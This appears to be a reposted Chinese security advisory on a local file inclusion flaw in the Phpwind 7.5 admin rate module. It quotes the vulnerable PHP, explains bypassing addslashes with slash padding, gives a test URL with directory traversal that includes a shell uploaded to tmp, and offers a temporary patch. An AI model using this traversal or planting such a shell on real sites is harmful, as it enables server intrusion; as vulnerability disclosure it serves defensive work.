Phpwind7.5 后台本地包含漏洞利用

影响版本:Phpwind7.5

    文件:hack\rate\admin.php

    源码:

    
    !function_exists('readover') && exit('Forbidden');

    define ( "H_R", R_P . "hack/rate/" );

    define ( "L_R", R_P . "lib/" );

    InitGP ( array ('ajax' ) );

    $action = strtolower ( ($job) ? $job : "admin" );

    $filepath = H_R . "action/" . $action . "Action.php";

    (! file_exists ( $filepath )) && exit ();

    if ($job != "ajax") {

    require H_R . '/template/layout.php';

    } else {

    require_once $filepath;

    }

    ?>

    再看看hack\rate\template\layout.php:

    
    !function_exists('readover') && exit('Forbidden');

    include_once PrintEot ( 'left' );

    print <<
    -->

    EOT;

    require_once $filepath;

    include_once PrintEot ( 'adminbottom' );

    ?>

    $job可以自定义,触发本地包含,只不过addslashes了,因此不能通过%00截断;但可以通过若干///////截断,或者直接在tmp文件夹下写个shell来包含。

    测试方法:

    提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!先在tmp下上传一个shell,名为Action.php

    然后访问:http://127.0.0.1/pw /admin.php?adminjob=hack&hackset=rate&typeid=100&job=../../../../../../tmp/

    临时补丁:

    $filepath = H_R . "action/" . $action . "Action.php";

    替换为:

    $filepath = Pcv(H_R . "action/" . $action . "Action.php");

本文由站长原创或收集,不代表本站立场,如若转载,请注明出处:http://yesck.com/post/22/

本文 暂无 评论

回复给

欢迎点评

联系我们

站长QQ:8117829

站长邮件:8117829@qq.com

工作时间:周一至周五,9:30-18:30,节假日休息

QR code